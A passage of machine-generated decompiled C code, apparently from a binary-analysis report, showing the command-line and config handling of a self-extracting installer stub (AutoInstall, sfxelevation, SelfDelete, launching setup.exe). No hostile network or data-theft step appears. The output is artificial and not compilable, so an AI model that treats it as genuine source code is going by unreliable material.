																																						_t451 = 0;
																																						goto L385;
																																					}
																																					__eflags = _t1102[0x19];
																																					if(_t1102[0x19] != 0) {
																																						goto L376;
																																					}
																																					 *0x41e3a0 = 1;
																																					goto L371;
																																				}
																																				_t1088 = L"setup.exe";
																																				_t623 = E00411318(_t1051,  &(_t1102[2]), E00411318(_t1051, _t1102 - 0xf4, _t1062, "\\"), L"setup.exe");
																																				_t1118 = _t1118 + 0x18;
																																				E00411391(_t831,  &(_t1102[8]),  *_t623);
																																				_push(_t1102[2]);
																																				L00418674();
																																				_push( *((intOrPtr*)(_t1102 - 0xf4)));
																																				L00418674();
																																				_t625 = GetFileAttributesW(_t1102[8]);
																																				__eflags = _t625 - 0xffffffff;
																																				if(_t625 == 0xffffffff) {
																																					E004046CC();
																																					_push(0xf);
																																					_push(0);
																																					E00408E03(_t1051);
																																					_push( *(_t1102 - 0x24));
																																					L00418674();
																																					_push(_t1102[8]);
																																					L00418674();
																																					_push( *(_t1102 - 4));
																																					L00418674();
																																					_push(_t1102[0xb]);
																																					L00418674();
																																					_push(_t1102[0xf]);
																																					L00418674();
																																					_t628 = _t1102[0x16];
																																					__eflags = _t628;
																																					if(_t628 != 0) {
																																						 *((intOrPtr*)( *_t628 + 8))(_t628);
																																					}
																																					L43:
																																					_push(7);
																																					goto L30;
																																				}
																																				_t1102[0x19] = 1;
																																				L300:
																																				E00411391(_t831, _t1102 - 0x24, _t1088);
																																				E0040408B(_t831, _t1051, __eflags, _t1102 - 0x24);
																																				_t1087 =  *(_t1102 - 0x24);
																																				while(1) {
																																					L301:
																																					_t553 = E004040E8(__eflags, _t1087, L"waitall", 0);
																																					_t1118 = _t1118 + 0xc;
																																					__eflags = _t553;
																																					if(__eflags != 0) {
																																						break;
																																					}
																																					_t554 = E004040E8(__eflags, _t1087, L"hidcon", 0);
																																					_t1118 = _t1118 + 0xc;
																																					__eflags = _t554;
																																					if(__eflags == 0) {
																																						_t555 = E004040E8(__eflags, _t1087, L"nowait", 0);
																																						_t1118 = _t1118 + 0xc;
																																						__eflags = _t555;
																																						if(__eflags == 0) {
																																							_t556 = E004040E8(__eflags, _t1087, L"forcenowait", 0);
																																							_t1118 = _t1118 + 0xc;
																																							__eflags = _t556;
																																							if(__eflags == 0) {
																																								_t557 = E004040E8(__eflags, _t1087, L"fm", 2);
																																								_t1064 = _t557;
																																								_t1118 = _t1118 + 0xc;
																																								__eflags = _t1064;
																																								if(__eflags == 0) {
																																									_t558 = E004040E8(__eflags, _t1087, L"shc", 3);
																																									_t1118 = _t1118 + 0xc;
																																									__eflags = _t558;
																																									if(__eflags == 0) {
																																										_t558 = E004040E8(__eflags, _t1087, L"del", 3);
																																										_t1118 = _t1118 + 0xc;
																																										__eflags = _t558;
																																										if(__eflags == 0) {
																																											_t559 = E004040E8(__eflags, _t1087, L"x86", 0);
																																											_t1118 = _t1118 + 0xc;
																																											__eflags = _t559;
																																											if(__eflags != 0) {
																																												L333:
																																												_t1087 = _t559;
																																												 *(_t1102 - 0x28) = 1;
																																												continue;
																																											}
																																											_t559 = E004040E8(__eflags, _t1087, L"i386", 0);
																																											_t1118 = _t1118 + 0xc;
																																											__eflags = _t559;
																																											if(__eflags != 0) {
																																												goto L333;
																																											}
																																											_t560 = E004040E8(__eflags, _t1087, L"amd64", 0);
																																											_t1118 = _t1118 + 0xc;
																																											__eflags = _t560;
																																											if(__eflags != 0) {
																																												L332:
																																												_t1087 = _t560;
																																												 *(_t1102 - 0x28) = 2;
																																												continue;
																																											}
																																											_t560 = E004040E8(__eflags, _t1087, L"x64", 0);
																																											_t1118 = _t1118 + 0xc;
																																											__eflags = _t560;
																																											if(__eflags == 0) {
																																												__eflags = _t1102[0x19];
																																												_t890 =  &(_t1102[8]);
																																												if(_t1102[0x19] == 0) {
																																													E00410F79(_t831, _t890, _t1102 - 4);
																																													L341:
																																													_t563 = E004113E9( &(_t1102[8]), __eflags, _t1087);
																																													L342:
																																													E00410F2D(_t563, _t1102 - 0x40);
																																													E00411362(_t1102 - 0x34, _t1051, __eflags, E004042CA(_t1102[8], _t1102 - 0x40));
																																													E0040408B(_t831, _t1051, __eflags, _t1102 - 0x40);
																																													__eflags =  *0x41e7e4; // 0x0
																																													if(__eflags != 0) {
																																														L353:
																																														__eflags = _t1102[0x19];
																																														if(_t1102[0x19] != 0) {
																																															L364:
																																															_push( *((intOrPtr*)(_t1102 - 0x34)));
																																															L00418674();
																																															_push( *((intOrPtr*)(_t1102 - 0x40)));
																																															L00418674();
																																															_push( *(_t1102 - 0x24));
																																															L00418674();
																																															_push(_t1102[8]);
																																															L00418674();
																																															_t1118 = _t1118 + 0x10;
																																															goto L365;
																																														}
																																														__eflags = _t1102[0x19];
																																														if(_t1102[0x19] != 0) {
																																															goto L364;
																																														}
																																														_t544 = 0;
																																														 *_t1102 = 0;
																																														 *( *(_t1102 - 4)) = 0;
																																														_push( *((intOrPtr*)(_t1102 - 0x34)));
																																														_t1102[0x12] =  &(_t1102[0x12][0]);
																																														L00418674();
																																														_push( *((intOrPtr*)(_t1102 - 0x40)));
																																														L00418674();
																																														_push( *(_t1102 - 0x24));
																																														L00418674();
																																														_push(_t1102[8]);
																																														L00418674();
																																														_t1118 = _t1118 + 0x10;
																																														_t1062 = 0x41e754;
																																														while(1) {
																																															_t1087 = 0;
																																															 *(_t1102 - 0x28) = 0;
																																															_t1102[0x19] = 0;
																																															E00410F2D(E00410F2D(_t544,  &(_t1102[8])), _t1102 - 0x24);
																																															_t1102[0x18] = 0;
																																															__eflags = _t1102[0xc];
																																															if(_t1102[0xc] == 0) {
																																															}
																																															goto L303;
																																														}
																																														goto L297;
																																													}
																																													_t590 = E00402829( *(_t1102 - 0x28));
																																													__eflags = _t590;
																																													if(_t590 == 0) {
																																														goto L353;
																																													}
																																													__eflags =  *_t831;
																																													if(__eflags == 0) {
																																														L348:
																																														E0040408B(_t831, _t1051, __eflags, _t1102 - 0x34);
																																														__eflags = _t1102[0x19];
																																														if(__eflags != 0) {
																																															_push(_t1102[0x18]);
																																															_push( *((intOrPtr*)(_t1102 - 0x34)));
																																															_push( *((intOrPtr*)(_t1102 - 0x40)));
																																															_t593 = E00404B6A(_t831, _t1051, __eflags);
																																															_t1118 = _t1118 + 0xc;
																																															__eflags = _t593;
																																															if(_t593 != 0) {
																																																SetLastError(_t593);
																																																L361:
																																																E00408E03(_t1051, 1, 0x10, _t1102[8]);
																																																E004046CC();
																																																_push( *((intOrPtr*)(_t1102 - 0x34)));
																																																L00418674();
																																																_push( *((intOrPtr*)(_t1102 - 0x40)));
																																																L00418674();
																																																_push( *(_t1102 - 0x24));
																																																L00418674();
																																																_push(_t1102[8]);
																																																L00418674();
																																																_push( *(_t1102 - 4));
																																																L00418674();
																																																_push(_t1102[0xb]);
																																																L00418674();
																																																_push(_t1102[0xf]);
																																																L00418674();
																																																_t596 = _t1102[0x16];
																																																__eflags = _t596;
																																																if(_t596 != 0) {
																																																	 *((intOrPtr*)( *_t596 + 8))(_t596);
																																																}
																																																_push(9);
																																																goto L30;
																																															}
																																															L352:
																																															E004027CD();
																																															goto L353;
																																														}
																																														SetCurrentDirectoryW( *0x41e754); // executed
																																														E00411362(_t1102 - 0x10, _t1051, __eflags,  *((intOrPtr*)(E004112F8(_t1102 - 0xe8, E00411318(_t1051, _t1102 - 0xd0, E0041133D(_t1051, _t1102 - 0xdc, "\"", _t1102 - 0x40), L"\" "), _t1102 - 0x34))));
																																														_push( *((intOrPtr*)(_t1102 - 0xe8)));
																																														L00418674();
																																														_push( *((intOrPtr*)(_t1102 - 0xd0)));
																																														L00418674();
																																														_push( *((intOrPtr*)(_t1102 - 0xdc)));
																																														L00418674();
																																														_t609 = E00404A70(__eflags,  *((intOrPtr*)(_t1102 - 0x10)), _t1102[0x18],  *0x41e754); // executed
																																														_t1118 = _t1118 + 0x3c;
																																														_push( *((intOrPtr*)(_t1102 - 0x10)));
																																														__eflags = _t609;
																																														if(_t609 == 0) {
																																															L00418674();
																																															goto L361;
																																														}
																																														L00418674();
																																														goto L352;
																																													}
																																													E004113E9(_t1102 - 0x34, __eflags, _t831);
																																													while(1) {
																																														__eflags =  *_t831;
																																														if(__eflags == 0) {
																																															goto L348;
																																														}
																																														_t831 =  &(_t831[1]);
																																														__eflags = _t831;
																																													}
																																													goto L348;
																																												}
																																												__eflags =  *_t1087 - 0x22;
																																												if( *_t1087 == 0x22) {
																																													E00411391(_t831, _t890, _t1087);
																																												} else {
																																													E00411391(_t831, _t890, "\"");
																																													E004113E9( &(_t1102[8]), __eflags, _t1087);
																																													E004113E9( &(_t1102[8]), __eflags, "\"");
																																												}
																																												_t563 = E004033FF( &(_t1102[0x13]), L"ExecuteParameters", 0);
																																												_t1087 = _t563;
																																												_t1118 = _t1118 + 0xc;
																																												__eflags = _t563;
																																												if(__eflags == 0) {
																																													goto L342;
																																												} else {
																																													E004113E9( &(_t1102[8]), __eflags, " ");
																																													goto L341;
																																												}
																																											}
																																											goto L332;
																																										}
																																										_t921 = (_t1087[3] & 0x0000ffff) - 0x30;
																																										__eflags = _t921;
																																										 *(_t1102 - 0x44) = _t921;
																																										L327:
																																										_t1087 = _t558;
																																										continue;
																																									}
																																									 *(_t1102 - 0x48) = (_t1087[3] & 0x0000ffff) - 0x30;
																																									goto L327;
																																								}
																																								__eflags =  *0x41e3a0 - 0xffffffff;
																																								if(__eflags == 0) {
																																									_t1089 =  &(_t1087[2]);
																																									__eflags = _t1089;
																																									__imp___wtol(_t1089);
																																									 *0x41e3a0 = _t557;
																																								}
																																								_t1087 = _t1064;
																																								continue;
																																							}
																																							_t1087 = _t556;
																																							L318:
																																							_t1102[0x18] = _t1102[0x18] | 0x00010000;
																																							continue;
																																						}
																																						__eflags =  *0x41e6fc;
																																						_t1087 = _t555;
																																						if(__eflags == 0) {
																																							continue;
																																						}
																																						goto L318;
																																					}
																																					_t1102[0x18] = _t1102[0x18] | 0x00000001;
																																					_t1087 = _t554;
																																				}
																																				_t1087 = _t553;
																																				_t1102[0x19] = 1;
																																				goto L301;
																																				L303:
																																				_t1088 = E004033FF( &(_t1102[0x13]), _t1102[0xb],  &(_t1102[0x12]));
																																				_t1118 = _t1118 + 0xc;
																																				__eflags = _t1088;
																																				if(_t1088 != 0) {
																																					goto L300;
																																				}
																																				_t1087 =  &(( *(_t1102 - 0x18))[1]);
																																				_t617 =  *_t1087 & 0x0000ffff;
																																				 *(_t1102 - 0x18) = _t1087;
																																				__eflags = _t617 - 0x30;
																																				if(_t617 < 0x30) {
																																					L306:
																																					__eflags = _t617 - 0x61;
																																					if(_t617 < 0x61) {
																																						L308:
																																						__eflags = _t617 - 0x41;
																																						if(_t617 < 0x41) {
																																							goto L356;
																																						}
																																						__eflags = _t617 - 0x5a;
																																						if(_t617 > 0x5a) {
																																							goto L356;
																																						}
																																						L310:
																																						E00411391(_t831,  &(_t1102[0xb]), L"AutoInstall");
																																						_t544 = E004011EE( &(_t1102[0xb]),  *_t1087 & 0x0000ffff);
																																						_push( *(_t1102 - 0x24));
																																						_t1102[0x12] = _t1102[0x12] & 0x00000000;
																																						L00418674();
																																						_push(_t1102[8]);
																																						L00418674();
																																						continue;
																																					}
																																					__eflags = _t617 - 0x7a;
																																					if(_t617 <= 0x7a) {
																																						goto L310;
																																					}
																																					goto L308;
																																				}
																																				__eflags = _t617 - 0x39;
																																				if(_t617 <= 0x39) {
																																					goto L310;
																																				}
																																				goto L306;
																																			}
																																		}
																																		__eflags =  *0x41e6fc;
																																		if( *0x41e6fc != 0) {
																																			goto L368;
																																		}
																																		goto L293;
																																	}
																																	E004046CC();
																																	_push(_t1102[0xb]);
																																	L00418674();
																																	_push(_t1102[0xf]);
																																	L00418674();
																																	__eflags = _t1086;
																																	if(_t1086 != 0) {
																																		 *((intOrPtr*)( *_t1086 + 8))(_t1086);
																																	}
																																	_push(8);
																																	goto L30;
																																}
																															}
																															goto L280;
																														}
																													} else {
																														__eflags = _t1102[0x19];
																														if(_t1102[0x19] != 0) {
																															goto L273;
																														}
																														_t642 =  *0x41e394; // 0x0
																														__eflags = (_t642 & 0x000000c0) - 0x80;
																														if((_t642 & 0x000000c0) != 0x80) {
																															goto L273;
																														}
																														_t644 = E00408C30(_t831, _t1050,  *0x41e710,  *0x41e70c);
																														_pop(_t880);
																														__eflags = _t644;
																														if(_t644 != 0) {
																															goto L273;
																														}
																														_push(_t1102[0xb]);
																														__eflags =  *0x41e744 - _t644; // 0x0
																														if(__eflags == 0) {
																															L00418674();
																															_push(_t1102[0xf]);
																															L00418674();
																															goto L268;
																														}
																														L00418674();
																														continue;
																													}
																												}
																												_t1091 = _t1102[0xe];
																												while(1) {
																													E00411391(_t831,  &(_t1102[0xb]), L"AutoInstall");
																													E004011EE( &(_t1102[0xb]),  *_t1091 & 0x0000ffff);
																													_t657 = E004033FF( &(_t1102[0x13]), _t1102[0xb], 0);
																													_t1118 = _t1118 + 0xc;
																													__eflags = _t657;
																													if(_t657 == 0) {
																														break;
																													}
																													_t1091 =  &(_t1091[1]);
																													_t661 =  *_t1091 & 0x0000ffff;
																													__eflags = _t661 - 0x30;
																													if(_t661 < 0x30) {
																														L250:
																														__eflags = _t661 - 0x61;
																														if(_t661 < 0x61) {
																															L252:
																															__eflags = _t661 - 0x41;
																															if(_t661 < 0x41) {
																																L254:
																																E00411391(_t831,  &(_t1102[0xb]), L"AutoInstall");
																																_t880 =  &(_t1102[0xb]);
																																E004011EE( &(_t1102[0xb]),  *(_t1102[0xe]) & 0x0000ffff);
																																_t1087 = _t1102[0x16];
																																goto L255;
																															}
																															__eflags = _t661 - 0x5a;
																															if(_t661 <= 0x5a) {
																																continue;
																															}
																															goto L254;
																														}
																														__eflags = _t661 - 0x7a;
																														if(_t661 <= 0x7a) {
																															continue;
																														}
																														goto L252;
																													}
																													__eflags = _t661 - 0x39;
																													if(_t661 <= 0x39) {
																														continue;
																													}
																													goto L250;
																												}
																												E00408E03(_t1050, 0, 0xe, _t1102[0xb]);
																												_push(_t1102[0xb]);
																												L00418674();
																												_push(_t1102[0xf]);
																												L00418674();
																												_t659 = _t1102[0x16];
																												__eflags = _t659;
																												if(_t659 != 0) {
																													 *((intOrPtr*)( *_t659 + 8))(_t659);
																												}
																												_push(6);
																												goto L30;
																											}
																										}
																										_t667 = E004016D1(_t1086); // executed
																										__eflags = _t667;
																										if(_t667 != 0) {
																											goto L238;
																										}
																										_push(8);
																										_push(_t667);
																										E00408E03(_t1050);
																										_push(_t1102[0xf]);
																										L00418674();
																										goto L235;
																									}
																									_t670 = E0040950E(_t876, __eflags,  &(_t1102[0x13]));
																									goto L229;
																								} else {
																									_t670 = E0040960B(_t1050,  &(_t1102[0x13]));
																									L229:
																									_push(_t1102[0xf]);
																									_t1079 = _t670;
																									L00418674();
																									_t671 = _t1102[0x16];
																									__eflags = _t671;
																									goto L195;
																								}
																							} else {
																								E0040A7B0(_t1102 - 0x1a0);
																								E0040AA10(_t1102 - 0x1a0, _t1084, lstrlenW(_t1084) + _t677);
																								E0040ACE0(_t1102 - 0x1a0, _t1102 - 0x114);
																								_t961 = 8;
																								memcpy(_t1102 - 0x138, "123456789ABCDEFGHJKMNPQRSTUVWXYZ", _t961 << 2);
																								_t1116 = _t1116 + 0x20;
																								asm("movsb");
																								_t963 = 0;
																								__eflags = 0;
																								do {
																									_t1052 =  *(_t1102 + _t963 * 4 - 0x104);
																									 *(_t1102 + _t963 * 4 - 0x114) =  *(_t1102 + _t963 * 4 - 0x114) ^ _t1052;
																									_t963 = 1 + _t963;
																									__eflags = _t963 - 4;
																								} while (_t963 < 4);
																								_t1069 = 0;
																								_t832 = 0;
																								__eflags = 0;
																								do {
																									asm("cdq");
																									_t1052 = _t1052 & 0x00000007;
																									_t1093 =  *(_t1102 + (_t1052 + _t832 >> 3) - 0x114) & 0x000000ff;
																									_t965 = _t832 & 0x80000007;
																									__eflags = _t965;
																									if(_t965 < 0) {
																										_t965 = 1 + (_t965 - 0x00000001 | 0xfffffff8);
																										__eflags = _t965;
																									}
																									_t1095 = _t1093 >> _t965 & 0x0000001f;
																									__eflags = _t832;
																									if(_t832 != 0) {
																										asm("cdq");
																										_t966 = 0x19;
																										_t1052 = _t832 % _t966;
																										__eflags = _t1052;
																										if(_t1052 == 0) {
																											_t695 = 0x2d;
																											 *((short*)(_t1102 + _t1069 * 2 - 0xac)) = _t695;
																											_t1069 = 1 + _t1069;
																											__eflags = _t1069;
																										}
																									}
																									 *((short*)(_t1102 + _t1069 * 2 - 0xac)) =  *((char*)(_t1102 + _t1095 - 0x138));
																									_t832 = _t832 + 5;
																									_t1069 = 1 + _t1069;
																									__eflags = _t832 - 0x7d;
																								} while (_t832 < 0x7d);
																								__eflags = 0;
																								 *((short*)(_t1102 + _t1069 * 2 - 0xac)) = 0;
																								_t876 = 0x41e6d4;
																								E00411391(_t832, 0x41e6d4, _t1102 - 0xac);
																								_t831 = _t1102[0x18];
																								 *0x41e6d0 = 1;
																								goto L223;
																							}
																						} else {
																							_t697 = E004033FF( &(_t1102[0x13]), L"HelpText", 0);
																							_t1096 = _t697;
																							__eflags = _t697;
																							if(__eflags == 0) {
																								_t1096 = E004025A3(0x18);
																							}
																							E0040796C(_t1102 - 0xc0, _t1050, __eflags);
																							 *((intOrPtr*)(_t1102 - 0xc0)) = 0x41b77c;
																							 *((intOrPtr*)(_t1102 - 0x88)) = 0x7d6;
																							E004079CD(E00407BC7(_t831, _t1102 - 0xc0, 0x11,  *0x41e718, _t1096, 0), _t1102 - 0xc0);
																							_push(_t1102[0xf]);
																							L00418674();
																							_t701 = _t1102[0x16];
																							__eflags = _t701;
																							if(_t701 != 0) {
																								 *((intOrPtr*)( *_t701 + 8))(_t701);
																							}
																							goto L14;
																						}
																					}
																					_t1050 =  *(_t1102 - 4);
																					 *_t1102 = _t524;
																					_t876 = 0;
																					 *((short*)(_t524 + _t524 +  *(_t1102 - 4))) = 0;
																					E00403B4F(_t831,  *(_t1102 - 4), __eflags,  *(_t1102 - 4), _t524 + _t524 +  &(_t1083[1]), 0);
																					_push( *(_t1102 - 4));
																					_t201 = _t1102 - 0x14;
																					 *_t201 = 1 +  *(_t1102 - 0x14);
																					__eflags =  *_t201;
																					L00418674();
																					_t522 = E004033FF( &(_t1102[0x13]), _t1060, _t1102 - 0x14);
																					_t1115 = _t1115 + 0x1c;
																				}
																				goto L203;
																			} else {
																				__eflags =  *0x41e734 & 0x00000004;
																				if(( *0x41e734 & 0x00000004) == 0) {
																					goto L197;
																				}
																				_t709 = E0040285A();
																				__eflags = _t709;
																				if(_t709 != 0) {
																					goto L197;
																				}
																				E00410F2D(E00410F2D(_t709,  &(_t1102[2])), _t1102 - 0x54);
																				E00411362(_t1102 - 0x10, _t1050, __eflags, E004042CA(GetCommandLineW(),  &(_t1102[2])));
																				E004112B4(_t1102 - 4, _t1050, __eflags, E00411318(_t1050, _t1102 - 0x34, E00411318(_t1050, _t1102 - 0x24, E0041133D(_t1050,  &(_t1102[8]), "\"",  &(_t1102[2])), L"\" -"), L"sfxelevation"), 0x20);
																				E00411391(_t831, _t1102 - 0x54,  *((intOrPtr*)(E004112F8(_t1102 - 0x40, _t1102 - 4, _t1102 - 0x10))));
																				_push( *((intOrPtr*)(_t1102 - 0x40)));
																				L00418674();
																				_push( *(_t1102 - 4));
																				L00418674();
																				_push( *((intOrPtr*)(_t1102 - 0x34)));
																				L00418674();
																				_push( *(_t1102 - 0x24));
																				L00418674();
																				_push(_t1102[8]);
																				L00418674();
																				SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
																				_t1079 = 0;
																				_t731 = E00404A70(__eflags,  *((intOrPtr*)(_t1102 - 0x54)), 2, 0);
																				_push( *((intOrPtr*)(_t1102 - 0x10)));
																				__eflags = _t731;
																				if(_t731 != 0) {
																					L00418674();
																					_push( *((intOrPtr*)(_t1102 - 0x54)));
																					L00418674();
																					_push(_t1102[2]);
																					L00418674();
																					_push(_t1102[0xf]);
																					L00418674();
																					_t671 = _t1102[0x16];
																					__eflags = _t671;
																					L195:
																					if(__eflags != 0) {
																						 *((intOrPtr*)( *_t671 + 8))(_t671);
																					}
																					goto L15;
																				}
																				L00418674();
																				_push( *((intOrPtr*)(_t1102 - 0x54)));
																				L00418674();
																				_push(_t1102[2]);
																				L00418674();
																				_push(_t1102[0xf]);
																				L00418674();
																				_t732 = _t1102[0x16];
																				__eflags = _t732;
																				if(_t732 != 0) {
																					 *((intOrPtr*)( *_t732 + 8))(_t732);
																				}
																				_push(0xb);
																				goto L30;
																			}
																		}
																		L180:
																		_t1082 = _t831;
																		goto L181;
																	}
																	_t740 = E004040AE(_t1081, L"ai");
																	__eflags = _t740;
																	if(_t740 == 0) {
																		__eflags = E004040AE(_t1081, L"om");
																		if(__eflags == 0) {
																			_t742 = E004040AE(_t1081, L"gm");
																			__eflags = _t742;
																			if(_t742 == 0) {
																				__eflags = E004040AE(_t1081, L"gf");
																				if(__eflags == 0) {
																					__eflags = E004040AE(_t1081, L"mf");
																					if(__eflags == 0) {
																						_t745 = E004040AE(_t1081, L"sd");
																						__eflags = _t745;
																						if(_t745 == 0) {
																							_t746 = E004040AE(_t1081, L"nr");
																							__eflags = _t746;
																							if(_t746 == 0) {
																								_t747 = E004040AE(_t1081, L"fm");
																								__eflags = _t747;
																								if(_t747 == 0) {
																									_t748 = E004040AE(_t1081, L"bpt");
																									_pop(_t1007);
																									__eflags = _t748;
																									if(__eflags == 0) {
																										_t749 =  *_t1081 & 0x0000ffff;
																										__eflags = _t749 - 0x70;
																										if(_t749 == 0x70) {
																											L178:
																											E00410F2D(_t749, _t1102 - 0x54);
																											_t124 = E004042CA( &(_t831[2]), _t1102 - 0x54) - 2; // -2
																											_t831 = _t124;
																											_t1102[0x18] = _t831;
																											E004010E5( *((intOrPtr*)(_t1102 - 0x54)));
																											_push( *((intOrPtr*)(_t1102 - 0x54)));
																											L00418674();
																											_t1112 = _t1112 + 0x10;
																											while(1) {
																												__eflags =  *_t831 - 0x20;
																												if( *_t831 <= 0x20) {
																													goto L123;
																												}
																												goto L118;
																											}
																										}
																										__eflags = _t749 - 0x50;
																										if(_t749 == 0x50) {
																											goto L178;
																										}
																										__eflags = _t749 - 0x79;
																										if(_t749 == 0x79) {
																											L168:
																											__eflags = _t831[2] - 0x20;
																											if(_t831[2] > 0x20) {
																												L170:
																												__eflags = _t749 - 0x3f;
																												if(_t749 == 0x3f) {
																													L173:
																													__eflags = _t831[2] - 0x20;
																													if(_t831[2] > 0x20) {
																														L175:
																														_t755 = E00404715(_t1007, _t1050, _t1081,  &(_t1102[0x13]));
																														__eflags = _t755;
																														if(_t755 == 0) {
																															goto L180;
																														}
																														__eflags = _t755 - 1;
																														if(_t755 == 1) {
																															_push(_t1102[0xf]);
																															L00418674();
																															_t756 = _t1102[0x16];
																															__eflags = _t756;
																															if(_t756 != 0) {
																																 *((intOrPtr*)( *_t756 + 8))(_t756);
																															}
																															_push(0x20);
																															goto L30;
																														}
																														_t831 = _t755;
																														_t1102[0x18] = _t831;
																														while(1) {
																															__eflags =  *_t831 - 0x20;
																															if( *_t831 <= 0x20) {
																																goto L123;
																															}
																															goto L118;
																														}
																													}
																													_t1102[0x19] = 1;
																													while(1) {
																														__eflags =  *_t831 - 0x20;
																														if( *_t831 <= 0x20) {
																															goto L123;
																														}
																														goto L118;
																													}
																												}
																												__eflags = _t749 - 0x68;
																												if(_t749 == 0x68) {
																													goto L173;
																												}
																												__eflags = _t749 - 0x48;
																												if(_t749 != 0x48) {
																													goto L175;
																												}
																												goto L173;
																											}
																											_t1102[0x19] = 1;
																											while(1) {
																												__eflags =  *_t831 - 0x20;
																												if( *_t831 <= 0x20) {
																													goto L123;
																												}
																												goto L118;
																											}
																										}
																										__eflags = _t749 - 0x59;
																										if(_t749 != 0x59) {
																											goto L170;
																										}
																										goto L168;
																									}
																									_push( &(_t1102[0x13]));
																									_push( &(_t831[4]));
																									_push(L"BeginPromptTimeout");
																									L163:
																									E0040480F(_t1050, __eflags);
																									_t1112 = _t1112 + 0xc;
																									while(1) {
																										__eflags =  *_t831 - 0x20;
																										if( *_t831 <= 0x20) {
																											goto L123;
																										}
																										goto L118;
																									}
																								}
																								_t761 =  &(_t831[3]);
																								_t1013 =  *_t761 & 0x0000ffff;
																								__eflags = _t1013 - _t1059;
																								if(_t1013 < _t1059) {
																									goto L180;
																								}
																								__eflags = _t1013 - 0x39;
																								if(_t1013 > 0x39) {
																									goto L180;
																								}
																								__imp___wtol(_t761);
																								 *0x41e3a0 = _t761;
																								while(1) {
																									__eflags =  *_t831 - 0x20;
																									if( *_t831 <= 0x20) {
																										goto L123;
																									}
																									goto L118;
																								}
																							}
																							__eflags = _t831[3] - 0x20;
																							if(_t831[3] > 0x20) {
																								goto L180;
																							}
																							_t1102[0x17] = 1;
																							while(1) {
																								__eflags =  *_t831 - 0x20;
																								if( *_t831 <= 0x20) {
																									goto L123;
																								}
																								goto L118;
																							}
																						}
																						_t762 =  &(_t831[3]);
																						_t1015 =  *_t762 & 0x0000ffff;
																						__eflags = _t1015 - _t1059;
																						if(_t1015 == _t1059) {
																							L152:
																							__eflags = _t831[4] - 0x20;
																							if(__eflags > 0) {
																								goto L180;
																							}
																							_push( &(_t1102[0x13]));
																							_push(_t762);
																							_push(L"SelfDelete");
																							goto L163;
																						}
																						__eflags = _t1015 - 0x31;
																						if(_t1015 != 0x31) {
																							goto L180;
																						}
																						goto L152;
																					}
																					_push( &(_t1102[0x13]));
																					_push( &(_t831[3]));
																					_push(L"MiscFlags");
																					goto L163;
																				}
																				_push( &(_t1102[0x13]));
																				_push( &(_t831[3]));
																				_push(L"GUIFlags");
																				goto L163;
																			}
																			_t767 =  &(_t831[3]);
																			_t1017 =  *_t767 & 0x0000ffff;
																			__eflags = _t1017 - _t1059;
																			if(_t1017 < _t1059) {
																				goto L180;
																			}
																			__eflags = _t1017 - 0x32;
																			if(_t1017 > 0x32) {
																				goto L180;
																			}
																			__eflags = _t831[4] - 0x20;
																			if(__eflags > 0) {
																				goto L180;
																			}
																			_push( &(_t1102[0x13]));
																			_push(_t767);
																			_push(L"GUIMode");
																			goto L163;
																		}
																		_push( &(_t1102[0x13]));
																		_push( &(_t831[3]));
																		_push(L"OverwriteMode");
																		goto L163;
																	}
																	_t93 =  &(_t831[3]); // 0x2
																	_t1019 = _t93;
																	_t770 =  *_t1019 & 0x0000ffff;
																	__eflags = _t770 - _t1059;
																	if(_t770 < _t1059) {
																		L130:
																		__eflags = _t770 - 0x61;
																		if(_t770 < 0x61) {
																			L132:
																			__eflags = _t770 - 0x41;
																			if(_t770 < 0x41) {
																				L136:
																				__eflags = _t770 - 0x20;
																				if(_t770 > 0x20) {
																					goto L180;
																				}
																				_t1102[0xe] = 0x41b8d4;
																				L135:
																				_t1102[0x19] = 1;
																				_t1102[0x19] = 1;
																				continue;
																			}
																			__eflags = _t770 - 0x5a;
																			if(_t770 > 0x5a) {
																				goto L136;
																			}
																			L134:
																			_t1102[0xe] = _t1019;
																			goto L135;
																		}
																		__eflags = _t770 - 0x7a;
																		if(_t770 <= 0x7a) {
																			goto L134;
																		}
																		goto L132;
																	}
																	__eflags = _t770 - 0x39;
																	if(_t770 <= 0x39) {
																		goto L134;
																	}
																	goto L130;
																}
																__eflags = _t506 - 0x2d;
																if(_t506 != 0x2d) {
																	goto L180;
																}
																goto L126;
															}
														}
														_t773 = E00403C08(__eflags,  &(_t1102[0xf]),  &(_t1102[0x13]), _t1078);
														_t1110 = _t1110 + 0xc;
														__eflags = _t773;
														if(_t773 != 0) {
															goto L112;
														}
														_push(_t1102[0xf]);
														L00418674();
														L104:
														__eflags = _t1058 - _t1078;
														if(_t1058 != _t1078) {
															 *((intOrPtr*)( *_t1058 + 8))(_t1058);
														}
														_push(4);
														goto L30;
													}
													_t491 = E004043AC(_t863, _t830, L"sfxconfig");
													__eflags = _t491 - _t1078;
													if(_t491 == _t1078) {
														goto L109;
													}
													__eflags =  *_t491 - 0x3a;
													if( *_t491 == 0x3a) {
														_t491 =  &(_t491[1]);
														__eflags = _t491;
													}
													_t1023 =  *_t491 & 0x0000ffff;
													__eflags = _t1023 - _t1078;
													if(_t1023 == _t1078) {
														goto L107;
													} else {
														while(1) {
															__eflags = _t1023 - 0x20;
															if(_t1023 > 0x20) {
																break;
															}
															_t491 =  &(_t491[1]);
															_t1023 =  *_t491 & 0x0000ffff;
															__eflags = _t1023 - _t1078;
															if(_t1023 != _t1078) {
																continue;
															}
															break;
														}
														__eflags =  *_t491 - _t1078;
														if( *_t491 == _t1078) {
															goto L107;
														}
														_t776 = E0040526E(_t1050, _t491,  &(_t1102[0xf]));
														__eflags = _t776;
														if(_t776 != 0) {
															goto L107;
														}
														_push(0xa);
														_push(_t1078);
														E00408E03(_t1050);
														_push(_t1102[0xf]);
														L00418674();
														goto L104;
													}
												}
												_push(9);
												_push(_t1078);
												E00408E03(_t1050);
												_push(_t1102[0xf]);
												L00418674();
												__eflags = _t1058 - _t1078;
												if(_t1058 != _t1078) {
													 *((intOrPtr*)( *_t1058 + 8))(_t1058);
												}
												_push(3);
												goto L30;
											} else {
												E00408E03(_t1050, 1, 7,  *0x41e79c);
												__eflags = _t1058 - _t1078;
												if(_t1058 != _t1078) {
													 *((intOrPtr*)( *_t1058 + 8))(_t1058);
												}
												_push(2);
												L30:
												_pop(_t1079);
												goto L15;
											}
										}
										__eflags =  *_t1076 - 0x3a;
										if( *_t1076 == 0x3a) {
											_t1036 = _t1076[1] & 0x0000ffff;
											_t800 = (_t1036 | 0x00000020) - 0x61;
											__eflags = _t800;
											_t834 = 2;
											if(_t800 == 0) {
												 *0x41e7e4 = _t834;
												while(1) {
													L64:
